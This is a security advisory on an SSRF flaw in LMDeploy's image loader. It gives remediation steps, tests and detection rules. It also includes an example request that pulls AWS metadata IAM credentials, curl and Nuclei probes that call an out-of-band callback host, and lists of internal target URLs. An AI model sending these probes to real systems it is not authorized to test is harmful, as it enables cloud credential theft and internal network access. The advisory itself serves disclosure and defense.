Vulnerability Analysis

CVE-2026-33626: LMDeploy SSRF Flaw Exploited in Under 13 Hours — How to Find It & Fix It

Executive Summary

A Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language image loader — tracked as CVE-2026-33626 — allows unauthenticated or low-privilege attackers to weaponize an AI model server's network identity, reaching internal services, cloud metadata endpoints, and IAM credential stores. First published in April 2026, the flaw was actively exploited in the wild within 13 hours of public disclosure, making this one of the fastest exploited AI infrastructure vulnerabilities on record. Organizations running LMDeploy for LLM inference — especially on cloud GPU instances — should patch to version 0.12.3 immediately.


1. What Is This Vulnerability?

LMDeploy is an open-source Python toolkit by InternLM for compressing, deploying, and serving large language models (LLMs). Its vision-language (VL) pipeline includes a helper function, load_image(), located in lmdeploy/vl/utils.py, that downloads images from URLs passed as part of a multimodal prompt.

The flaw: load_image() fetches arbitrary URLs without validating the destination IP address. There is no allowlist, no blocklist, and no check for RFC 1918 private ranges or link-local addresses. The model server fetches whatever URL an attacker supplies, and the response can be reflected back to the caller through error output or streamed responses.

How the Vulnerable Code Looks

# VULNERABLE — lmdeploy/vl/utils.py (pre-0.12.3)
import requests
from PIL import Image
from io import BytesIO

def load_image(url: str) -> Image.Image:
    response = requests.get(url, timeout=10)   # No URL validation
    return Image.open(BytesIO(response.content))

An attacker providing a multimodal API request such as:

{
  "messages": [{
    "role": "user",
    "content": [
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}},
      {"type": "text", "text": "Describe this image."}
    ]
  }]
}

…receives the AWS Instance Metadata Service (IMDS) response embedded in the model's error output or streaming response — handing over temporary IAM credentials without any authentication bypass required.

Attack Vector

The attack surface is the model's public or internal API endpoint — any port exposing the LMDeploy OpenAI-compatible /v1/chat/completions route. The attacker:

  1. Sends a multimodal chat completion request with a crafted image_url pointing to an internal resource.
  2. The GPU server fetches the URL on the attacker's behalf.
  3. The HTTP response body is returned to the attacker (via error, streaming fragment, or image decode failure message).
  4. Likely targets include AWS IMDS (169.254.169.254), the GCP metadata server (169.254.169.254/computeMetadata/v1/), Azure IMDS, internal Redis/MySQL hosts, and secondary admin interfaces. An attacker-controlled out-of-band (OOB) DNS endpoint is used to confirm blind fetches and to exfiltrate data.

Real-World Impact

Sysdig's threat research team detected active exploitation of their honeypot within 12 hours and 31 minutes of CVE disclosure. The attacker was observed:

  • Port-scanning the internal network behind the model server
  • Querying the AWS IMDS to harvest IAM role credentials
  • Reaching Redis and MySQL internal database ports
  • Using an out-of-band DNS endpoint for blind data exfiltration

Because GPU inference nodes typically run with broad IAM roles (for model artifact S3 access, logging, etc.), a single successful IMDS fetch can pivot into full cloud account compromise.


2. Who Is Affected?

Component                             | Affected Versions / Risk
lmdeploy (PyPI)                       | All versions < 0.12.3
InternLM LMDeploy GitHub              | All commits prior to the 0.12.3 release tag
Dockerized deployments                | Any container image built from pre-0.12.3 source
Cloud GPU instances (AWS/GCP/Azure)   | Highest risk (IMDS accessible by default)
On-prem bare-metal deployments        | Elevated risk if internal services are reachable

You are NOT affected if:

  • You are running LMDeploy ≥ 0.12.3
  • You serve only text (non-VL) models with no vision pipeline loaded
  • Your deployment is fully air-gapped and the inference node cannot make outbound HTTP requests to any destination, including internal hosts and the cloud metadata address

3. How to Detect It (Testing)

Manual Testing Steps

  1. Identify the endpoint. Confirm the LMDeploy server is running and accepting multimodal requests:

    curl http://<host>:<port>/v1/models
    

    Look for a vision-capable model in the list (e.g., internlm-xcomposer, llava, etc.).

  2. Set up a listener. Use a service like Burp Collaborator or interactsh to capture out-of-band requests:

    interactsh-client -v   # records DNS/HTTP callbacks
    
  3. Send the SSRF probe. Submit a multimodal request with the OOB URL:

    curl -X POST http://<host>:<port>/v1/chat/completions \
      -H "Content-Type: application/json" \
      -d '{
        "model": "<vision-model-name>",
        "messages": [{
          "role": "user",
          "content": [
            {"type": "image_url", "image_url": {"url": "http://<your-interactsh-host>/ssrf-probe"}},
            {"type": "text", "text": "What is in this image?"}
          ]
        }]
      }'
    
  4. Check for internal metadata access. On cloud instances, target the IMDS:

    # Replace image_url with:
    "http://169.254.169.254/latest/meta-data/"
    

    If the server response contains metadata text (AMI ID, IAM role name, etc.) in any part of the response body or error message, the server is vulnerable.

  5. A positive result looks like: an HTTP callback recorded at your OOB listener, or metadata content reflected in the API error response.
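The manual steps above can also be scripted. The following is a minimal sketch, not an official tool: build_probe_payload() and looks_like_metadata_leak() are hypothetical helper names, and the marker strings are an assumed heuristic based on well-known IMDS key names. It builds the same request body as the curl command in step 3 and checks a response body for reflected metadata as described in step 4.

```python
def build_probe_payload(model: str, probe_url: str,
                        prompt: str = "What is in this image?") -> dict:
    """Build an OpenAI-style multimodal chat request whose image_url is the probe URL."""
    return {
        "model": model,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "image_url", "image_url": {"url": probe_url}},
                {"type": "text", "text": prompt},
            ],
        }],
    }


def looks_like_metadata_leak(response_text: str) -> bool:
    """Heuristic check: does the body echo common IMDS key names? (assumed marker list)"""
    markers = ("ami-id", "instance-id", "security-credentials")
    lowered = response_text.lower()
    return any(marker in lowered for marker in markers)
```

The payload can be sent with any HTTP client (for example, passed as the json argument of requests.post against /v1/chat/completions). Only run it against systems you are authorized to test.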

Automated Scanning

  • Tool: Nuclei with a custom template

  • Template Concept:

    # Pass the model name at run time, e.g. -var model=<vision-model-name>
    id: CVE-2026-33626-lmdeploy-ssrf
    info:
      name: LMDeploy Vision-Language SSRF
      severity: high
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/v1/chat/completions"
        headers:
          Content-Type: application/json
        body: |
          {"model":"{{model}}","messages":[{"role":"user","content":[
            {"type":"image_url","image_url":{"url":"http://{{interactsh-url}}"}},
            {"type":"text","text":"describe"}]}]}
        matchers:
          - type: word
            part: interactsh_protocol
            words:
              - "http"
    
  • Expected output: Interaction detected at the OOB callback host.

  • Tool: Snyk — scan the Python environment:

    snyk test --file=requirements.txt --package-manager=pip
    # Look for: lmdeploy @ <0.12.3 — SSRF (CVE-2026-33626)
    

Code Review Checklist

  • Search codebase for requests.get(url) or urllib.request.urlopen(url) called with user-supplied input
  • Verify load_image() or equivalent URL-fetching helpers validate destination IPs against a blocklist
  • Confirm RFC1918 ranges (10.x, 172.16-31.x, 192.168.x), link-local (169.254.x.x), and loopback (127.x) are blocked
  • Check that cloud metadata IP 169.254.169.254 is explicitly denied
  • Ensure no partial URL content is reflected back in error messages (information disclosure)
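The first checklist item can be partly automated. As a rough sketch (find_fetch_calls() and the FETCH_CALLS list are hypothetical and should be extended for your codebase), the standard-library ast module can flag fetch calls whose first argument is not a string literal, which are the call sites worth reviewing by hand:

```python
import ast

# Call names worth a manual look (assumed list; extend as needed).
FETCH_CALLS = {"requests.get", "requests.post", "requests.request",
               "urllib.request.urlopen", "urlopen"}


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from nested Attribute/Name nodes; '' if not a plain dotted name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def find_fetch_calls(source: str) -> list:
    """Return sorted (line, call_name) pairs for fetches with a non-literal first argument."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in FETCH_CALLS:
            first = node.args[0] if node.args else None
            is_literal = isinstance(first, ast.Constant) and isinstance(first.value, str)
            if not is_literal:
                hits.append((node.lineno, _dotted_name(node.func)))
    return sorted(hits)
```

This only narrows the search. It cannot tell whether the argument is actually attacker-controlled, so each hit still needs a manual data-flow review.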

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade LMDeploy immediately.

    pip install --upgrade "lmdeploy>=0.12.3"
    

    Verify:

    python -c "import lmdeploy; print(lmdeploy.__version__)"
    # Expected: 0.12.3 or higher
    
  2. Rebuild Docker images if you maintain containerized deployments:

    # Update your requirements.txt or Dockerfile
    RUN pip install "lmdeploy>=0.12.3"
    

    Then rebuild and redeploy all running containers.

  3. Rotate any credentials exposed during the window. If your server was running a vulnerable version and was internet-accessible, assume IMDS credentials were harvested. Rotate IAM roles, API keys, and service account tokens immediately.

  4. Enable IMDSv2 on AWS EC2 instances to require token-based metadata requests (thwarts SSRF-based IMDS access even if SSRF exists):

    aws ec2 modify-instance-metadata-options \
      --instance-id <your-instance-id> \
      --http-tokens required \
      --http-endpoint enabled
    
  5. Restrict outbound network egress from inference nodes using security groups, NACLs, or iptables rules so they can only reach necessary destinations (model storage, logging sinks).
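For fleets with many nodes, the version check from step 1 can be turned into a small gate. This is a minimal sketch with hypothetical helper names (parse_version(), is_patched()). It compares only the numeric release components and ignores pre-release suffixes such as rc1, so a stricter check would use a dedicated version-parsing library instead.

```python
import re

PATCHED = (0, 12, 3)  # fixed release named in this advisory


def parse_version(version: str) -> tuple:
    """Extract leading numeric components, e.g. '0.12.3.post1' -> (0, 12, 3)."""
    match = re.match(r"\s*v?(\d+(?:\.\d+)*)", version)
    if not match:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(1).split(".")]
    while len(parts) < 3:          # pad '0.12' to (0, 12, 0)
        parts.append(0)
    return tuple(parts)


def is_patched(version: str) -> bool:
    """True if the numeric release is at least the patched version."""
    return parse_version(version) >= PATCHED
```

In practice the input would be the value of lmdeploy.__version__ collected from each host or container image.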

Code Fix Example

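The patched load_image() in 0.12.3 validates the destination IP before fetching. The listing below is a simplified illustration of that approach, not a verbatim copy of the upstream patch:

# PATCHED (illustrative sketch): lmdeploy/vl/utils.py (>= 0.12.3)
import ipaddress
import socket
import requests
from urllib.parse import urlparse
from PIL import Image
from io import BytesIO

BLOCKED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),         # "this network"
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),    # link-local / cloud IMDS
    ipaddress.ip_network("127.0.0.0/8"),       # loopback
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),          # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),         # IPv6 link-local
]

def _is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        # getaddrinfo returns IPv4 and IPv6 records; gethostbyname is IPv4-only
        infos = socket.getaddrinfo(parsed.hostname, None)
        ips = [ipaddress.ip_address(info[4][0]) for info in infos]
    except (socket.gaierror, ValueError):
        return False
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so it is checked as IPv4
    ips = [getattr(ip, "ipv4_mapped", None) or ip for ip in ips]
    # Every resolved address must fall outside every blocked network
    return bool(ips) and not any(ip in net for ip in ips for net in BLOCKED_NETWORKS)

def load_image(url: str) -> Image.Image:
    if not _is_safe_url(url):
        raise ValueError(f"Blocked URL (SSRF protection): {url}")
    # Redirects are disabled so a public URL cannot bounce to an internal one.
    # DNS is resolved again by requests, so DNS rebinding stays possible unless
    # the connection is pinned to the validated IP or egress is filtered.
    response = requests.get(url, timeout=10, allow_redirects=False)
    return Image.open(BytesIO(response.content))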
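A hand-maintained blocklist like the one above is easy to leave incomplete. As a complementary sketch (is_blocked_ip() is a hypothetical helper, not part of LMDeploy), Python's ipaddress module exposes classification properties that cover the same ranges and a few more, including IPv4-mapped IPv6 addresses:

```python
import ipaddress


def is_blocked_ip(ip_text: str) -> bool:
    """True if the IP literal points at a private, loopback, link-local or otherwise
    non-public destination. Raises ValueError if ip_text is not an IP literal."""
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:10.0.0.1 is the IPv4 address 10.0.0.1 in disguise; classify it as IPv4.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)
```

The function takes an already-resolved address. Hostnames still have to be resolved first, and the check applied to every address returned.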

Configuration Hardening

Beyond patching, harden the host environment:

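# Block cloud metadata endpoint at iptables level (defense-in-depth)
# Note: this also stops the server's own SDK calls from fetching instance-role credentials
iptables -A OUTPUT -d 169.254.169.254 -j DROP
ip6tables -A OUTPUT -d fd00:ec2::254 -j DROP   # AWS IPv6 IMDS address

# Restrict outbound to required destinations only
# (the final DROP also blocks DNS and loopback traffic unless you add ACCEPT rules for them)
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d <model-storage-cidr> -j ACCEPT
iptables -A OUTPUT -j DROP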

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: After upgrading to 0.12.3, send the SSRF probe from Section 3, step 3. Confirm that no OOB callback is received and that the API returns an error response (for example HTTP 400) instead of processing the image.
  • Scenario B: Send a legitimate multimodal request with a valid public image URL — confirm the model processes it normally (no regression in functionality).
  • Scenario C: Attempt to fetch http://127.0.0.1:<internal-port>/ via the image URL — confirm it is blocked.

Security Test Cases

Test Case 1: SSRF probe no longer triggers

  • Precondition: LMDeploy upgraded to ≥ 0.12.3
  • Steps: Submit multimodal request with image_url = http://169.254.169.254/latest/meta-data/
  • Expected Result: API returns HTTP 400 or 500 with a blocked/invalid URL error; no metadata content in response; no OOB callback recorded

Test Case 2: Private IP ranges blocked

  • Precondition: LMDeploy ≥ 0.12.3
  • Steps: Submit image_url = http://192.168.1.1/ and http://10.0.0.1/
  • Expected Result: Both requests rejected before any outbound connection

Test Case 3: Legitimate image URL still works

  • Precondition: LMDeploy ≥ 0.12.3, test with a known public image
  • Steps: Submit image_url = https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/280px-PNG_transparency_demonstration_1.png
  • Expected Result: Model responds normally to the multimodal prompt

Automated Tests

# pytest security regression test
import pytest
import requests

LMDEPLOY_BASE = "http://localhost:23333"
VISION_MODEL = "internlm-xcomposer"

SSRF_URLS = [
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1/",
    "http://10.0.0.1/",
    "http://192.168.1.1/",
    "http://172.16.0.1/",
]

@pytest.mark.parametrize("ssrf_url", SSRF_URLS)
def test_ssrf_blocked(ssrf_url):
    resp = requests.post(f"{LMDEPLOY_BASE}/v1/chat/completions", json={
        "model": VISION_MODEL,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "image_url", "image_url": {"url": ssrf_url}},
                {"type": "text", "text": "describe"}
            ]
        }]
    }, timeout=60)  # without a timeout, a hung server would stall the test run
    # Must not return 200 with content from internal resource
    assert resp.status_code in (400, 422, 500), f"Expected error for SSRF URL: {ssrf_url}"
    body = resp.text.lower()
    assert "iam" not in body
    assert "ami-id" not in body
    assert "security-credentials" not in body

6. Prevention & Hardening

Best Practices

  • Validate all user-supplied URLs before making outbound HTTP requests in any server-side component. Never trust user input to determine fetch destinations.
  • Apply defense-in-depth at the network layer. Even if application-level URL validation fails, a firewall rule blocking access to 169.254.169.254 and RFC1918 ranges provides a critical safety net.
  • Pin AI/ML framework versions in your requirements.txt or pyproject.toml and automate dependency vulnerability scanning with Snyk, Dependabot, or OSV-Scanner in CI/CD.
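  • Enforce IMDSv2 everywhere. With tokens required, IMDS only answers requests that carry a session token obtained through a PUT request with a custom header, which a GET-only SSRF primitive such as this one cannot issue. This blocks IMDS credential theft on AWS but does not protect other internal services.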
  • Limit IAM permissions for inference nodes using least-privilege roles — they should not have iam:* or s3:* on all buckets.
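The least-privilege point can be checked mechanically. The sketch below is an illustration under assumptions: broad_statements() is a hypothetical helper, and the definition of "broad" (a service-wide or global wildcard action paired with a wildcard resource) is a simplification. It flags Allow statements in an IAM policy document that grant this kind of access:

```python
def _as_list(value) -> list:
    """IAM allows a bare string or object where a list is expected; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def broad_statements(policy: dict) -> list:
    """Return (action, resource) pairs where a wildcard action meets a wildcard resource."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action")):
            wildcard_action = action == "*" or action.endswith(":*")
            if not wildcard_action:
                continue
            for resource in _as_list(stmt.get("Resource")):
                # "*" matches everything; "arn:aws:s3:::*" matches every bucket
                if resource == "*" or resource.endswith(":::*"):
                    findings.append((action, resource))
    return findings
```

A policy that grants s3:GetObject on a single model bucket produces no findings, while s3:* on all resources is reported.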

Monitoring & Detection

Set up the following alerts to catch exploitation attempts in real time:

# 1. Alert on inference hosts reaching internal database ports (Redis, MySQL)
# (CloudWatch Logs Insights query over VPC Flow Logs. Flow logs do not record
# traffic to 169.254.169.254, so use the host-level rules below for IMDS access.)
filter srcAddr = "<inference-node-ip>" and dstPort in [6379, 3306]

# 2. SIEM rule: connection to internal RFC1918 or IMDS address from GPU node process
# (Falco rule for container workloads; add exceptions for legitimate internal traffic)
- rule: LMDeploy SSRF Attempt
  desc: Outbound connection to private/IMDS IP from lmdeploy process
  condition: >
    outbound and proc.name startswith "python" and
    (fd.snet in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") or
     fd.sip = "169.254.169.254")
  output: "Possible SSRF: %proc.name connecting to %fd.sip"
  priority: CRITICAL

# 3. Audit outbound connect() calls made by the Python interpreter
# (auditd rule; adjust the exe path to the interpreter that runs LMDeploy)
-a always,exit -F arch=b64 -S connect -F exe=/usr/bin/python3 -k ssrf_connect

Log aggregation: Forward inference node access logs to your SIEM and alert on:

  • Any request body containing the string 169.254.169.254
  • Unusually short image download times followed by large response payloads (possible metadata reflection)
  • Requests to internal hostnames/IPs from the model API endpoint
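The first and third alerts can be prototyped as a log filter before they are encoded in a SIEM. This is a minimal sketch assuming that request bodies are logged as JSON in the OpenAI-compatible chat format shown earlier. suspicious_image_urls() is a hypothetical helper, and it only catches IP literals, not hostnames that resolve to internal addresses.

```python
import ipaddress
import json
from urllib.parse import urlparse


def suspicious_image_urls(request_body: str) -> list:
    """Return image_url values whose host is a private, loopback or link-local IP literal."""
    try:
        payload = json.loads(request_body)
    except json.JSONDecodeError:
        return []
    if not isinstance(payload, dict):
        return []
    flagged = []
    for message in payload.get("messages", []):
        content = message.get("content") if isinstance(message, dict) else None
        if not isinstance(content, list):      # plain-text messages carry no image parts
            continue
        for part in content:
            if not isinstance(part, dict) or part.get("type") != "image_url":
                continue
            image = part.get("image_url")
            url = image.get("url", "") if isinstance(image, dict) else ""
            host = urlparse(url).hostname or ""
            try:
                ip = ipaddress.ip_address(host)
            except ValueError:
                continue                       # hostname, not an IP literal
            if ip.is_private or ip.is_loopback or ip.is_link_local:
                flagged.append(url)
    return flagged
```

Any non-empty result for a logged request is a strong signal of an SSRF attempt, since legitimate image URLs rarely point at internal IP literals.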
